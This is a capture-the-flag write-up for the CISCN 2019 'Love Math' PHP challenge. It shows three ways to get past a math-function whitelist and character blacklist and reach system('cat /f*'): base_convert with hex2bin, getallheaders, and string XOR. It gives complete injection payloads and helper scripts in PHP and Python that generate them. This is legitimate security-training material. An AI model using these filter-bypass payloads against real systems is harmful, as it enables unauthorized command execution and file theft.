[CISCN 2019 Preliminary Competition] Love Math: executing commands through base conversion

Table of Contents

hex2bin bin2hex

base_convert

dynamic function

The first solution is to obtain parameters through get

bypass

The second solution is to read the request header

getallheaders

echo a,b

The third solution is XOR to get more characters


This question is also very interesting!

The challenge restricts the input with a whitelist and a blacklist: every identifier in the expression (any run of letters and underscores) must be one of the whitelisted PHP math functions, and the blacklist rejects a set of characters outright. Variable names and array keys are identifiers too, so they also have to be whitelisted names.

To execute a command under these rules we have to turn numbers into characters, and the first functions that come to mind are hex2bin and bin2hex.

hex2bin bin2hex

hex2bin() decodes a hexadecimal string into the bytes it represents, and bin2hex() goes the other way. A string of hex digits can therefore stand in for characters that are not allowed in the input.

bin2hex('_GET') is 5f474554, and hex2bin('5f474554') gives back _GET.

Next we need to understand the base_convert() function

base_convert

base_convert($number, $frombase, $tobase) converts a number between any two bases from 2 to 36; digits above 9 are written with the lowercase letters a to z.

For example, base_convert(37907361743,10,36) returns the string hex2bin, and base_convert(696468,10,36) returns exec.

The name hex2bin consists only of digits and lowercase letters, so it can be spelled by converting a decimal number to base 36 and the resulting string can then be called as a dynamic function. base_convert cannot produce uppercase letters or the underscore, which is why _GET still needs hex2bin.
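As an added example, which is not part of the original writeup: the following Python script computes the numbers behind these conversions for any identifier, picks the smallest base that can spell it, and checks the result against the integer range of a 64-bit PHP build (the PHP_INT_MAX value and the 64-bit assumption are mine). It also shows why the getallheaders payload of the second solution has to use base 30, and it reassembles the c= value of the first solution from the computed numbers.

```python
# Added example (not code from the original writeup): compute the numeric
# arguments that make PHP's base_convert() and hex2bin(dechex()) spell out an
# identifier, and check each number against a 64-bit PHP build's integer range.
import string

PHP_INT_MAX = 2**63 - 1                            # assumption: 64-bit PHP build
ALPHABET = string.digits + string.ascii_lowercase  # digit symbols base_convert uses (bases 2..36)


def base_convert_encode(word, base=None):
    """Return (n, base) such that PHP base_convert(n, 10, base) yields word.

    base_convert only emits the lowercase digits 0-9a-z, so word must consist of
    those characters. With base=None the smallest base containing every character
    is chosen: a smaller base keeps n smaller, which is what lets a long name such
    as getallheaders stay within PHP's integer range.
    """
    values = [ALPHABET.index(ch) for ch in word]   # ValueError for '_' or uppercase
    if base is None:
        base = max(max(values) + 1, 2)
    if not 2 <= base <= 36 or max(values) >= base:
        raise ValueError("base %d cannot represent %r" % (base, word))
    n = 0
    for v in values:                               # Horner evaluation of the digits
        n = n * base + v
    return n, base


def fits_php_int(n):
    """base_convert() parses its input as an integer while it fits and silently
    switches to a double (losing the low-order digits) once it overflows, so a
    payload number must stay at or below PHP_INT_MAX to be converted exactly."""
    return 0 <= n <= PHP_INT_MAX


def dechex_encode(text):
    """Return n such that PHP hex2bin(dechex(n)) yields text.

    Covers characters base_convert cannot produce, e.g. '_' and uppercase in _GET.
    dechex() drops leading zeros, so the first byte must be >= 0x10 or the hex
    string would have odd length and hex2bin() would reject it.
    """
    data = text.encode("ascii")
    if data[0] < 0x10:
        raise ValueError("first byte of %r would lose a leading hex digit" % text)
    n = int.from_bytes(data, "big")
    if not fits_php_int(n):
        raise ValueError("%r is too long to encode as a single integer" % text)
    return n


def solution1_payload():
    """Assemble the c= value of the first solution from the encoders above."""
    hex2bin_n, hex2bin_base = base_convert_encode("hex2bin", 36)
    get_n = dechex_encode("_GET")
    return ("$pi=base_convert(%d,10,%d)(dechex(%d));"
            "($$pi){pi}(($$pi){abs})" % (hex2bin_n, hex2bin_base, get_n))


if __name__ == "__main__":
    for word in ("hex2bin", "exec", "getallheaders"):
        n, base = base_convert_encode(word)
        print("base_convert(%d,10,%d) -> %s  fits PHP int: %s"
              % (n, base, word, fits_php_int(n)))
    n36, _ = base_convert_encode("getallheaders", 36)
    print("getallheaders in base 36 needs %d, fits PHP int: %s" % (n36, fits_php_int(n36)))
    print("hex2bin(dechex(%d)) -> _GET" % dechex_encode("_GET"))
    print("c=" + solution1_payload())
```

With the default base the script picks base 34 for hex2bin and exec (x is digit 33), which gives smaller numbers than the base 36 used in the writeup; both spell the same name, so either works in the payload.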

Dynamic function

The first solution is to obtain parameters through get

We cannot simply write system(cat /flag) as the input: system is not a whitelisted name, and the command itself contains characters such as spaces that the filter rejects, so neither the function name nor the command can appear literally.

But consider how PHP calls functions dynamically:

$a($b)

$a=system

$b=cat /f*

is exactly system(cat /f*): a variable holding a function name can be called, and the argument is just another string.

The question is then how to get those two strings into $a and $b. The simplest source is the request itself, via GET or POST:

_GET[1](_GET[2])

1=system

2=cat /f*

is equivalent to system(cat /f*), with both the function name and the command supplied as query parameters rather than written in the expression.

Now the question changes to how to pass characters

_GET is not a whitelisted identifier, and [ and ] are on the blacklist, so the expression cannot be written as-is.

This involves bypassing

Bypass

First, [] is easy: PHP 7 also accepts {} for array and string offsets, so _GET{1} works in place of _GET[1]. (PHP 8.0 removed this curly-brace offset syntax, so the trick is tied to PHP 7.)

Second, the name _GET has to be produced mathematically. hex2bin converts hexadecimal to the characters it encodes, so that is the route to _GET.

bin2hex('_GET') gives the hexadecimal string 5f474554.

That string cannot be used directly: it contains a letter, and any run of letters in the input is treated as an identifier and checked against the whitelist (quoting it is not an option either). So replace it with something made only of digits: the decimal value of 0x5f474554 is 1598506324, and dechex(1598506324) rebuilds 5f474554 at runtime.

The last piece is hex2bin itself, which is not whitelisted either. Its name contains only digits and lowercase letters, so base_convert can produce it: base_convert(37907361743,10,36) is hex2bin, and the resulting string is called like a function.

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /f*

Step by step:

$pi=base_convert(37907361743,10,36)(dechex(1598506324)) is $pi=hex2bin(5f474554), that is $pi=_GET

($$pi){pi} is $_GET{pi}, because $$pi looks up the variable whose name is stored in $pi

(($$pi){abs}) is ($_GET{abs})

Combined: $_GET{pi}($_GET{abs})

The variable name pi and the keys pi and abs are chosen because they are whitelisted function names and therefore pass the identifier check.

With pi=system and abs=cat /f* this becomes system(cat /f*).

The second solution is to read the request header

Building $_GET this way is laborious. Can the command be taken from somewhere that needs less construction?

Instead of reading GET parameters, we can read the request headers, and the function that does so has a name made only of lowercase letters.

getallheaders

getallheaders() returns all HTTP request headers of the current request as an associative array, header name to value.

So exec(getallheaders(){1}) runs whatever value the request header named 1 carries; exec is obtained from base_convert in the same way as hex2bin above.

There is another knowledge point that needs to be understood here.

echo a,b

echo accepts a comma-separated list of expressions and prints each one in turn, so echo a,b outputs ab.

Since the input is evaluated inside an echo, one statement can both assign $pi and then call the function: the call becomes the second element of the list, and the value exec() returns (the last line of the command's output) is printed along with it.

Converted through base_convert:

c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

Here the bare word base_convert is an undefined constant, which PHP 7 evaluates to the string "base_convert" (with a notice; PHP 8 throws an Error instead), so $pi becomes a callable name. $pi(696468,10,36) is exec, $pi(8768397090111664438,10,30) is getallheaders, and (){1} calls it and takes the header named 1.

Then send the request with the header 1: cat /f*

getallheaders is converted with base 30 rather than 36. The name contains only digits and letters up to t (digit value 29), so 30 is the smallest base that can express it, and it keeps the number below PHP_INT_MAX (9223372036854775807 on 64-bit builds). In base 36 the value would exceed that limit, base_convert would fall back to a floating-point representation, and the low digits, and with them the spelled-out name, would be lost.

Third solution XOR to get more characters

Can more characters be obtained with fewer function calls?

XOR between two strings gives us more: in PHP, ^ applied to two strings XORs them byte by byte over the length of the shorter operand. A whitelisted function name XORed with a two-digit number can therefore yield characters such as _ and uppercase letters that neither base_convert nor digits can write directly.

Let's write PHP code to enumerate every name/number pair:

<?php
// Whitelisted math function names from the challenge.
$pl = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
// XOR every name against every two-digit string "00".."99". PHP string XOR
// works byte by byte over the shorter operand, so each line shows the two
// characters obtainable from that name/number pair.
for ($k = 0; $k < sizeof($pl); $k++) {
    for ($i = 0; $i <= 9; $i++) {
        for ($j = 0; $j <= 9; $j++) {
            $exp = $pl[$k] ^ ($i . $j);
            echo $pl[$k] . "^" . $i . $j . "===>" . $exp . "\n";
        }
    }
}
?>

Searching the output for the pieces of _GET gives mt_srand^23===>_G and tanh^15===>ET, so (mt_srand^(2).(3)).(tanh^(1).(5)) evaluates to _GET. The digits are written as (2).(3) because quotes are on the blacklist, and . binds tighter than ^, so the concatenation happens before the XOR.

Then proceed exactly as in the first solution:

?c=$pi=(mt_srand^(2).(3)).(tanh^(1).(5));$$pi{1}($$pi{0})&1=system&0=cat /f*

Under PHP 7's uniform variable syntax $$pi{1} is read left to right as ($$pi){1}, that is $_GET{1}, so the extra parentheses of the first solution are not needed here.
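As an added example that is not from the original writeup, here is the same search in Python, but directed at a target: for each two-character piece of the wanted name it derives the digit string a whitelisted name must be XORed with (name ^ piece), keeps the pair only if every byte is a decimal digit, and assembles the quote-free expression. The whitelist is the one from the PHP script above; the PHP string-XOR semantics (byte-wise over the shorter operand) are emulated in php_str_xor, and the "shortest name wins" choice is my own.

```python
# Added example (not code from the original writeup): directed search for
# whitelisted function names whose PHP string XOR with a digit string yields
# each piece of a wanted identifier, plus assembly of the quote-free expression.
WHITELIST = [
    'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',
    'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex',
    'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax',
    'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value',
    'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand',
    'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin',
    'sinh', 'sqrt', 'srand', 'tan', 'tanh',
]


def php_str_xor(a, b):
    """PHP's 'str' ^ 'str': byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in
                 zip(a.encode("latin-1"), b.encode("latin-1"))).decode("latin-1")


def xor_candidates(chunk, names=WHITELIST):
    """Every (name, digits) pair with name ^ digits == chunk in PHP.

    The digit string is not searched but forced: digits = name ^ chunk (XOR is its
    own inverse), and the pair is usable only when every byte lands in '0'..'9',
    because digits are what the filter lets us write without quotes ((2).(3) is "23").
    """
    found = []
    for name in names:
        if len(name) < len(chunk):
            continue
        digits = php_str_xor(name, chunk)            # truncates to len(chunk)
        if all("0" <= ch <= "9" for ch in digits):
            found.append((name, digits))
    return found


def build_xor_expr(target, chunk_len=2, names=WHITELIST):
    """Split target into chunks, pick the shortest usable name for each chunk,
    and return (php_expression, chosen_pairs). Raises if a chunk is unreachable."""
    chosen = []
    for i in range(0, len(target), chunk_len):
        chunk = target[i:i + chunk_len]
        cands = xor_candidates(chunk, names)
        if not cands:
            raise ValueError("no whitelisted name XORs to %r" % chunk)
        chosen.append(min(cands, key=lambda c: (len(c[0]), c[0])))
    # (name^(d).(d)) per chunk, chunks joined with '.'; no quotes anywhere.
    expr = ".".join(
        "(%s^%s)" % (name, ".".join("(%s)" % d for d in digits))
        for name, digits in chosen
    )
    return expr, chosen


if __name__ == "__main__":
    for chunk in ("_G", "ET"):
        print(chunk, "<-", xor_candidates(chunk))
    expr, chosen = build_xor_expr("_GET")
    print("$pi=%s;   evaluates to %r" % (expr, "".join(php_str_xor(n, d) for n, d in chosen)))
```

Run on _GET the search confirms the writeup's pairs (mt_srand^23 and tanh^15) and also finds shorter ones such as is_nan^64 and tan^15; every name it emits is already on the whitelist, so the assembled expression passes the identifier check as long as the target chunks are reachable.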